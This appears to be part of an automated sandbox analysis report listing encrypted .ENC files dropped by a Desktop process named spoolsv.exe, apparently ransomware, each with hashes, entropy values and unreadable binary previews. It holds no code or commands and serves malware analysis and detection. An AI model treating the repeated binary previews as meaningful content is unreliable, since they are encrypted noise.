                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..|....W0.D..5....rh.Ci.z.........M..k.5y.i7.N@..Ta.cq.w%@p...g.....k{...mD...}..M.......k(nA+..|(..P}......B.*8...?..)....P..s..a.=.3.*.1..k..(/b..e.....A.#...wu...... .....\fU.........._rX...-.[.Q.....%B..^.....]'|+r.....i..d...4........f5,..P.4..CB^(.,u.5.o.r...w.........8.$9S.P.........c....VntD=..$$..4u9Z)6.GM.#....b.b.:....=..b..o.."a..._fe....#T/`.]....x4p.....P....]........J..c...PwF....T.:.l.O']^...H..uA....o..9.?.}y...=.J.wJ.cG...[!.D}-../..*.a r...J.....e...>.l.9..A..>-[@."$.P......jU.+G.8.&.A.+......4.L|}/.9...m<Q.|.=....=L.'.d*H.|..f..d......di.......#.8.k...c.)`.ke......m.....b.}%..!h.-....WI..r.V.."~5.7...J...-Q.M#dK........K.i..Z...M(9....DW.XR.......{~.y%O9PV.p.c.xK..`.Rk..c.C.....z.v.)X|....S9KA..+c6..";.A.P...(]...]....q..?H....2..a..@f.9k.w.Op.J.T..%S."......g..b7.].+m+N}..e]..'..B-...W....)...B../..}J...u.1.y.!}\K.RqjExv..`."....x(=l....C0f..YY.]&Y...1~./...v....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701200v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.867365770687652
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/7M+fXvZ1KDNIgFCgWGyOSj76HJpdha/3gA/oeotbQT9vcU28krDREjhhqJk32G4:/7M+fXvbYNvRB9JpdQfgA/oeotcBvM7L
                                                                                                                                                                                                                                                      MD5:1E3D4619B96B5E34BA9B463F407899B9
                                                                                                                                                                                                                                                      SHA1:213BB9E972BBB3F4F97AF345A301DD55A09B0DA7
                                                                                                                                                                                                                                                      SHA-256:82A13E8D397BD6E49D3E96F68CBD4B9E361109F82DE29471726835DF205D0BD9
                                                                                                                                                                                                                                                      SHA-512:AAC6290EBF84A816014E8DB4B87A9318EDA7C457C47BAB108FBCAAE30C263C3BB785276E4993D1F23E32B3AAF6CFA61572B5BD8DAFCBBC90DE58BBFA8A36BC94
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...U.#....`.+..F/.6.H...tt.1`.S...B.r.&f........V)%...B.G....v..r..#.I...s...W.....tCJ...'2.J..~/$.......0.U4...&74....).X.F.y-.....~...#Z..I'.uWP.m...X...........T...o.m..q.o..m8.5.m....I....Y.>7.E...%@....F.@.B..glD.'.O.6.....1.u6xs#W....a.V...?....+..A.e....}W)...`.....+*y..7...).....9.g.s|.A..aQ.n...w....,V...=H....WZ.=..9.L.V3#.... )...|..wd.._....S.zr...t..k0......s<.N-Cpt.1.rd.}.\:#.......N2.....KwZ.].%..%?..n...C.B..$.........=M..)(.Ky.b2....7`*...].......\Wg~K..-4.(..".W.ns:....n7O"....<.:......j...."...U.W..TI..Z[.. ..S..b.q&.}.v.x....!.,...H.7.I.....B.zb...y.<Ee....*.Z5.A7h..4..'...(.W:%......wn4.|g.(M.'..&.e....]?....x8#%..s ...q.{N.%WW#.x.A.fa*B^..-.`..0....U..........P.|WAT................ .J..D.o.e.......?.w1.|H!c......{...5H..5.,U......`........y..b.z.Qz.r...i..w.c`A...d.2.....,.0...9....9W.....~g......V~...*.0....k.......4.Ah.E..GR.:...jK..%..."RSuT.K.w4X.^........`...\.q..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701201v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.868755584297658
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/iSIRMj4oS57WXw0qBoolnd5CtnnxlXOkaJJhzBTFCvN6rfTLrZn:/ipRMk6gLBTn+tnnekaJJhVRCl6LTLN
                                                                                                                                                                                                                                                      MD5:0546BF8AA4579929EF40F6F2203FEAFF
                                                                                                                                                                                                                                                      SHA1:F31EF36E244F5A45883681C415E6A0961A18304D
                                                                                                                                                                                                                                                      SHA-256:44366E7959029DC09875909221AF37FCEDCFEB9F0CD4FC187A0F191B5769A3BF
                                                                                                                                                                                                                                                      SHA-512:BB79A140112942DFBCF21212D2502FC5E210F19AF8AA173E3F087D3EF950121E0802EAE4B15F2EA1C3B5CE1D4B7583E0FDD39C4AC90CCF1FA409EFD918342557
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.FM...z.....1.^..l.n@.........[..J.*....7wrn......"....b.n.Z..R..-.R`......6 .F9....?.i...#t.....G......u>#.....~...i...J.H}..X.@gN../..V.6..u.S.&.../..Q.;.N.......8.s>..~.K.....e`..*K.!#/.u....i.X.......\...U.J1.F..?......rf..LL.H.n...p."W......G.......bA.5a.q$..._H.%.#...<ND.W.#..........0...........I.I...!..8Z.E..&5k...BZ..y.[.C..D7.\..gCM.`....U...[rk5...sW.?7..:s....9...x.V.v.`..D./..Pa.O(.Tt.nY...'I.#....8..^...IR.....T...-T.3$."...e9.B.%....N./\y..>......J.j...O..,@.....c>,.OF.......&...^...w:..s...z.9.GY.......B.q...,B^...L7.....:.. &Y.]..;y..bpk'~.Com2.)..'@<EM!.X..2.M.C.....].c..CM...tt...?..{..P....ly.*.TjF..p.....3.......>..?.s:@.."../[2.. P.d....H|...5r..._3.Y...~.>...-..|I%.....u..#..N4d...(.-i.0...=.....D.a.\..b.gi!.....Bgkr.......>..!..0..\............Z....Y(.(Z..=M.-...y.p.. .L.J..n.r.....|..j...-..Nw...L`.@.{..>.gOK@o.N\O...E_...C4v.L.H9..lxx.D.2...0....S.`.t.]<.....k..3E.>5.T.m.q..N

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701250v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.866402703472014
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/vpDvRj0J/ORvFxpQ5xBIMVBpjIVVLSuFIS9yD6icqHVOV6LDLZMTKG4DfMSC:/vpzN0tO9i5xBIMVrjSxFe9HVOobu4D0
                                                                                                                                                                                                                                                      MD5:4ABC974F3E8C33BD69ACBBFBEE48DDAA
                                                                                                                                                                                                                                                      SHA1:68380A1396E3DD7C871139E2DBBA39A7281DD305
                                                                                                                                                                                                                                                      SHA-256:5952089C9D3556CDD0D6B1BD812C00503CBBE5F1FE11DD3B460CBE93C795A094
                                                                                                                                                                                                                                                      SHA-512:D4CBE447306728FBD261507E40FBFBEF7FDF015F7712355C3FAE675AD0B3E06B81E2CCAA5E4C832BD2AA09164BAAD3E99A0DCB9630CF9310DB583C64DAB1D158
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t. $.z.........c~...1....jZ......Li.R.../..V...^.....7..\.v-n..!..=...G..jO.f..].M..DZ.&U..4.<1%Z.Rk.Q..m..;!..R.....l(67...uuy.e.g...^..{.3.s3c...Ub+...xS..F......bS..b..].8/..4.=.d......u. ....eS.#./gZ.u.xJP@Q......).*..h..qZ[6h[./...$?*xggi..,.....Va.W..,.}.p.7O.e.G....G..h.;E..EW...6....8w6.W.ry.8m.c....-}A.-.....s.V.{!....|.,...3.g.g..+.h;..........[......^.B.....^U...j.H.....j.K._HoA...D~.....H.....N..V$.%.... ...Mg..J>........>.8yz..D..i".s.KU........'.@....Eu....."...(j..,.R~..`.....e.E7..sT.}(]..TG.X...>>.h?8..jmL&...U...ZSY.l.hI......b,YP+9p..X..Qb#)RI...X8.n....3"d..d?.G_.n.......T........B.y......l....%....o.}.E*7..H$09..B.x..3Q@.O....:....Nmq..V..f....%'..v..6.n.....u".......ky?V)....c..7y....l.1..j....]..t..'T....f....2..2..p9.q9...L..2TF....Eo[..d.F....1.-B..r..*$.....W..l.k.f..._e......Z...Uh.0j.lz....K..$.Umo.R.'..k.%.!a......=.oi={5MM#...c0a..z\.:.~.z5...u.$.... .3

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701251v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.838953530124917
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/wubShAIflAzQ/nhckBHWnjzmAmKK9rHe5Iy6ExezRAciBtLz42Ma02M:/R2lAzQfndWn+AmKKRCqEAzR3wtL0ao
                                                                                                                                                                                                                                                      MD5:D680D968D82B36018836923BD6052453
                                                                                                                                                                                                                                                      SHA1:FEE82F3C614957898D1B286EE3BED3E0D7A322B1
                                                                                                                                                                                                                                                      SHA-256:77FCA44CB30488DC663AD1AEC4E1BAED18518BFD4BCF67668AC99CD29A286805
                                                                                                                                                                                                                                                      SHA-512:C9D9E82DD8D300898D50AB6E701A0B246DE32A4C95C6BBA97D3649F1E0B4DBDA01F2E9CB26B52B797D19A743C78EA500A34A1FC22902EE27C23C5EF6D945EC7A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.-.P..g..._|........?.........&...M*......Z..$Q..S......MJU.....EE....h.....8.21i8$.H.V..|.........Q`.....-..*`...ji......t@,....G.....=/...l8S.8.Ud.u....RA...w.....{....H..FM.....2....0.X-X..;;g...P!..rB.......@...>._..=..2.f..}....o.K..c.d.v..Np....& ..;%...`....O-..d..B.".F.Ih.....}.I za...M.!r5...}.d`p......C%Mr.0J.....M..w....W....?....$e..7...b.AY..t.O....h..Rm.a&...a.N..F.....p.9...ct...3......_j..y.C..)..<..1..h..j?v........4dh~.4..t,c.r.`.B../.l..Q..y.`0.GTu.!..o....AV..Q...G.ZN..H.L.....h.1I.B.3..8.j...*..%=....W.[.{.y.EN..HHc....}.c.X.....&.h.H......+.<.-ma.+2V..b..D.t*r..?..v..Q.[Z....=....X...}k..I.c=.}.~..8u...."p}.G..\.u.,6...9. ....`.V..]I..T>..qQ....twZq..m.%..h.]...x..K...M..........`....,.u./J.a.J..Fa.Q'.......YYS...4|.W....`.!....c..4.u).aK0..(3*..j...Y.N,..>..%..Em.2...........eB8...D.P4...;....... .y.e...oEe.W..YR...7.1Q.....R.i8)..u.-...Q..Y.j..s......^`.....P.yK.}b0;.}D.PB~...Pn

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701300v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.868107947924646
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/vK1lZazvwqRk4WgNEY/mzS/ESztE3JSNwHPW5FPlAPxWXcYgHQPCD:/vcyFm4WgNd/G3Sz8JlH+PCPxWXcYgwS
                                                                                                                                                                                                                                                      MD5:FE7293D58EC277D828AB34B26867ED1C
                                                                                                                                                                                                                                                      SHA1:EFA7C27D49F605A43DD02F913DD486B0D54A3664
                                                                                                                                                                                                                                                      SHA-256:B465A346F56B2FF8ECC0F9EFC25392A1FA00FCBF75873FA6A2B5D6191CC51844
                                                                                                                                                                                                                                                      SHA-512:10611099F57266E43056ACBBBE83C361AEB2CC25EE839CD731BEAE504A9044F1F911B9ED5932C24E478336C3BE42E14FF8DD8D73AE6713DCB08B0CBE0B76021E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....J4.x ..M...}..p_. %.../...0...{.,.P..~&.....^.^.*....=..$..^.!>...,......znY..yfe.2H.L.~../..!.9Rft....^..tY.+e4...T.Q.2SA;.B..|.k.......v......#....O.}.u..?*LG.=0..+.GL<..f.Y.].-..!..9|.\.......v..?.Y.fs..|..a.1s.n.b...K..Q.%"..(Im.U........+O)....oE..L76{.5.ay...y.....j6..].3..a.\....[B. ......wq..!Q....+.....J.ts.....?..fQy..9[.O)..i%.B8..H....{&...F`a...jxM.. .;.O..\{.G.R.*......Jdm.A.={.`.f.M"u.91........[=......A.....6].r,...>...1^4.E..5.........1.h./]4.....s..2.....B.=.i.....]....-.B...@IJ......m.#..h3.Q35.. 7...E.j.n].(D........Q7..m....G.p.k...0C..P....8.[....p..2.r....8.N....'Nj....cf9......8$..,..CC..aV^r ...W...>......_.?.<}.5.n-A.....wl...3...n...d..@......n*.<U.u..I...M.e..V.....3A......~.p1...L......X..D.....j.<VS....E.<0.J...!Q.&.S.......K.....a.A.........!6e.!3...M..h..j....1.f.....d.9.`,R.u&..:.[.yD.r.w.......$S.'..k.xW.tb.....D.8D.....||.i.j.oVm....5......n8.8|..J.8

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701301v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.875562500506953
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/Akrf1yBUMCivd1Iy72J/41eQ9kq19V2qTH/uVf70uGi1v2f:/Akrf1yJZvdJm41FP9Du/Gi10
                                                                                                                                                                                                                                                      MD5:F698287E8F77CA803DDD56C2E82BFED1
                                                                                                                                                                                                                                                      SHA1:89E9B6C29CF64B79539474CD2EC317CCDE4FF23C
                                                                                                                                                                                                                                                      SHA-256:CC2993B073C07822394B378A50A9E9D1E45F047820A6CD7BE0562780499F1FC5
                                                                                                                                                                                                                                                      SHA-512:0784DFA30CBF63A1537DB21BDCD84F01C7E51D1899BF28CCC33F4EE9431AF34BCF64D59E1246323AFC50FCAF5BB888B8BE4B85EC7E6A791ED82BA3C90AC84A1B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..#.Tr.....%...........d...2...2...'cf.0|D.b..D.M.I"Po.........:.G.wU....fO.)}A6.h~.1j....D....A....L...xYV..-e.&.#.-..LA......EXQ<...i..G..Z. zI.k. ..u%......7F3p.h. C..)yK=...n.x..nR..,}..#..7..Bx..G@$s.j,....^r.q..te.c...].{w..i)w].n...xq..m.i...n{Q..R.........d..8~.Q.u..7#} ...4..Hr...Y:.%.....S.."x..k.1...y.m.N..I3D.(..._.~...3.w4.../.XI...E.e.........._3.7^c.0LT....l{.........B......g.j...{d..f...h..wqe0p.~.....b....dPS....5V..p.g%........ ...7..........t/.....v.i~..At....?u..HYU\E...]..K.0....O...b.519{4.S.i...w&;....x..Jh0....t.ag/.w.9..^E..w..~s!..=}..8.U...y.oe.M*A5....s....Z.0Q.Y.....^.i.}gg..3P........L)....:'.'>.-.!-.v...[C...J<........C.;........\.....c...C^[yJ.s.].'..(.R.\....B.!....CwE.@."..t.....h....-H..A4.Z....6M.X..F....=0.....J.7-...U....%....jq.F....j...R...B.._...:ny.Qi~...OH....\...g.XO.....3.C..-......I..g.l...6.M.+....*..^.n.1@M..T.Y..P....JY."wA...p..c..f..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701350v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.870528487589015
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/5XsezlQytiHVlFTC+U1lF/Z2deMBT4pV3iQhujnpZAkYMC73ICy9gIw0:/1seBQyts7FTC+U1lFxMepVSQ8+kYMCM
                                                                                                                                                                                                                                                      MD5:3A4C99EDE650DCFD4C935B28EAAC0C7F
                                                                                                                                                                                                                                                      SHA1:B49D952FAEC8B609FB6315E813DFBB14F61E88B6
                                                                                                                                                                                                                                                      SHA-256:516218FA063A7C421C9627A3D5D6736DB5DA30E56994094442D285001356FE27
                                                                                                                                                                                                                                                      SHA-512:4AC422E8A5CE41775A56AF453F9FC3C9C6AD79C6228303991FC5BAB47DF09AFA052079A6CF4EEC7F289AF974306112532CC990478733AC4C700C8319E5C0E171
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.P.1..W..;...c.&6>.....k8/..=L.4.Pd]2t..x..{.......}.t..$..o....e.....p.a.#./4..1..P....I....v..o.....wL.h/].y.k...>vfr..9..J.IvmG(.R.p.A.M.7......q...t3U\PQ?....0.....D...\..W;..&.d......~..y>...X.i..pe..V1..r..G.h>CT5U......oj"K..j...34.]..].;t.......#.j...4..d..&o..3s.......y.>d.].K.........`..8!...Z^..n./.AWQNl...3......;xr.-..7p.d..4.0._.....dC..Q:.[.<5....6...TM...3d...a..........|......d.Vg.2[.....fG/...|.......f.^&..*..r. .\.I.o....`.*..1._ {s..j...q.1I"..."A.$...v`..@^..A.&}+.;.I..:.....0d.c...Rn..vM:&;.&Y.*.l..w.].C.u.oN.Q4. '..^S}..Z..v5...}...{..V..Q<../U..t\..,.T...2d..BsT.f,}~.Lh....c ..a......_...z..Y..F.......gg..y......epr....gu.,..ms.. ...*l.?...C=..\...c0.//....>n.......mPw...E8xG.vq...!..".#\.._.....}.,......U.`........e......D1.4".I"y..).v.[...z.H..3.'S.o......?!..._...d..<...Q.q9.b./..J......C.!.....p.g......}9J.x.....LC~.e.j..4>..b;C.4..*.......V.n...a.>#X.L.V1.4.M.W

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701351v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.877802536175444
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/mP6zCHi8KWtGJnDwbXqhBNv7J4iEJSWTQQWqFn5PFqBJLOpaoaeSF/E0lsX:/1zCHi87QnMbXov94tJST6Fn5PAfOCd0
                                                                                                                                                                                                                                                      MD5:2D8AC3B2D8E6628563F055A1F469C999
                                                                                                                                                                                                                                                      SHA1:E22B3D23BFBF51803B04E519687A27F5A6B077E7
                                                                                                                                                                                                                                                      SHA-256:761BAEC87BDBF9F5C5D206EDDC80C46DBDB74D11447229833058E33F02D8B3D9
                                                                                                                                                                                                                                                      SHA-512:9DDF05363A501F7E81CB429EBFCFAED610E6953A4BF90CEC56C75592420AEE1387BAD29CF10DB55DC06F557B9FC6AD3AB8EC7F08C7EC0FDC1D14B1D9709F26AA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....so..i[4 .{.....~s...?..&.......>B..>..P..gf^.e&]......j..mD.E.F/...Z,8...vU,y.....&..wt....oV..Z...uHm..&.V....iy.D4....P...mL8.Yl{!aB.4F.'.........S.D.*...F<dhL..>..... E..`..%,.......gp.....r..Hsg..i.r..`....kW..eu<...BR..[..F9..x.l....GR;GT....G...am.P>.....r...c..)9|...>....bt..4.K....=h.p6.:!.{..@.D.......#......96..z.yM.vx..4.\.z....#.Xt[.-...'"....xP_D..6d..<C..4.sR..0....{...7.!..(.C..*.%.s$";...n.vY..{.!f..8....3..g...V......*.....R..M`..y..;8..e.|..q.1.SyDd..Z.w....2......G.."..O....L...\.h[..g~1v.E....<.....sx..m..A....XF.\3}!p.F..)5\.n.p.Y.LZ8..2.e..<..z..U.nJ...(...*.Yiu..'...J.S..MP..Z.PT(O<.G(..0..>?YD.K..u.@..7.....Bz..d.6..-...f.g9.a..N......}..eO.o.D..SG..P;%e%6.V'......D.{.E...,[Fs.!..bFf...P.F..hO........0..?Hx4..2..N"..N2.7...+pZ.......G....6..U'...C..+.>........f.g.h...w.......p.."...^@9+E.1....`G.g.G.w .p.....R.xs9..AB..c$.....:.P1..5........n.j..l5.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701400v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.87075898416551
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/hCEki1XYOWTJmZjYOs4eBLIhwIEbPCzbrp8CX9hMLIU+0Bs/g69Y72ifrIOeXNS:/NkiuwY34exrtCzh8U9hKrBs/79Y728v
                                                                                                                                                                                                                                                      MD5:57C182A8E162DBBFCDA0326339E1F9C9
                                                                                                                                                                                                                                                      SHA1:FF2623E825C22A16A1A861125C9371235918CC38
                                                                                                                                                                                                                                                      SHA-256:956FB6D04EADE78A2965AD6F9AB66B8067BF420CFC48653158B8B1D8E96AB962
                                                                                                                                                                                                                                                      SHA-512:6693369E8B77DD96B2664DFEBD069B40818DB421DE40F02A7AF1506FDC691E23AD2CB54D65428458D1536E0D89742F05B9A09BCAE6EF246416CD5D8F45926521
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.O....P2...pp..o..Y..dH...@.O"D..8m../..v.V...H...;..=v.; ;..y>..q.F......P..x.J.=...Y1....{.P2*aU5.Y,5^6.H.C."...r.g.b....-v.F-..A.O...c....G*.){.4pC.aQ.Rn.H.....o1.cMI.-.S...1..9..x..."x.d6.Q. ..''..M...%......o....[k?..../..x..Jg...PB_X{.0..J.cf...5.j.c.hVl..Z..h...w...B..%.G..X..'...<6...3(.Yu>.J.j.N.q..".3evS..Z5[Z..X.w..E..)......Ks4.-..:.....>CF.._B.z#...*h{.;....#f.....i..........w_'.........u.5.cQ........YJe%."..@..QoK.N,.....N..=..7.;......@D....2..j.pE..?&..dU.i./..Hw...H..^.....J~..8...y.p0,..]..v'.4.....G.$.d...;....u..T....q..m..p.r.W.w.....L.$%(...">.;W..)C^.FM0=.Tn"......J.:I....0:...O...e.."..V'.c....BL...5.q.;.A.....].#Y.)...'a_.d3...1....-..3.O.R.....J~u'W..q..X?}.m1..~.7J......;.A.C...d.1..T.B.>NW.h'...'......4/....x.......l.x....O...SO.M.=:-+{:.T..-X.A.O...um_D+....[.....\j...d^..#....@...T........._`-u....E.@V......l.......a{Fo`8U.B@.GV+...!...N..c......'....q8..Q..^.<.....Y......<8f=.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701401v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.870752591816557
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/pRPlDOVwr5KPco87hCQuynyF8NCTz7pBC78BZ9oZcVHUn25Wkzsaun:/nNqVwokXlCQuyVNUBOcZ9oZcVHz0kFu
                                                                                                                                                                                                                                                      MD5:EB1E9B66FCFA1EBE6CF878011D08FB70
                                                                                                                                                                                                                                                      SHA1:4BB28B8E24D5C4C4649A832FBF51D27A1EA32109
                                                                                                                                                                                                                                                      SHA-256:CAAB88B89CF0A6269A3FBBAAE49258879C9C342BF3B1C423CA07AAE432775B88
                                                                                                                                                                                                                                                      SHA-512:856ED8F4B6A6D84CC23F4CFE9A385729B38F29520BC9F9CAF3DE993E89B6BDB3E6725DC0ED14D1D59390365B08B5BB592931C27C905B9FEE793DA6F95E851129
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...kK..gQ......I.LD:.7.$...D..].;...^..../.....H.".j,.+..!&8...|.e>.....>..4=Df....D/A..y....s@.s...}.#^.=(.]P.I....mL..9K#r.IE^.B,1.+4.....%.?.....0q.r.......l`......G...4.l.(.......=}.c..r_J0...J........<...D*..ejv..f.....G-.3znm]e&.hO...p.<V+.....d...|.V.Tut......I.Z}J..}1.GL....w.SQ.4.^..G.%"..!.t-YU'..o.No...j...\..f..^%...|..tD.=l..FJ.5.....\J'..EN.S,N{|....G..........^.Z.....W_..x.f.I%..K.-[GJ..%.Q..Z4O'.....p.P..d.(.,J.Avir70.bb.....$.).$..E2..p.@dl..M.yK...{Q..!....n......g..-.6i....V5?....9.u..DB.......W8CU..xT^.,.u9.>.&D..V..!..,.V@..s..,s1zW...d.._..H.$.F.z>..g)zC.F.Rp...)..]...#Z..9..P,]-v..!.B..R7....?`..=.&Iw|t..o.?..u.l.uf)f.J.v!..4.a.[y..Y..R.;......h3.Z~..O.L..<lT!..b....6<h...[.R8.1.._...8.?4nf..E.*......#.'.t..a.l.-.......n}>.^..m.DB2.u..Dd.h.e.b.KI..#}...] ._.R2.-s.e.........Y..AR..+c.......!.AK.{c............Z...cH.....:........g.$..xw...............(.^Z...C..aHa.@....v

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701500v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.853871923293588
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24://cw54DZv6ygu5Uwt+ebN4ZGuew66Oi9AudezC0NrXPsOO3:/eiygEtVSP6gee0Nts
                                                                                                                                                                                                                                                      MD5:D64D706BA1265B5AF1519E1BD251BE09
                                                                                                                                                                                                                                                      SHA1:3DBF9BAA486279CBC8BCAAD1DAF9839BE3C0B1A5
                                                                                                                                                                                                                                                      SHA-256:9C837D9B9D89F9DF1A2EB793477EC0C3F66D4A80A6699BEBE5F6D2E12851BFA2
                                                                                                                                                                                                                                                      SHA-512:902E5315A67EA616137DE29B7E5467805FC21FC952131C3D233207B7CAA6B31E5486E9C14F3F8DC7F6E44A04EDFE557BAC7A041C346B574271EAFD3441BCCA90
                                                                                                                                                                                                                                                      Malicious:false
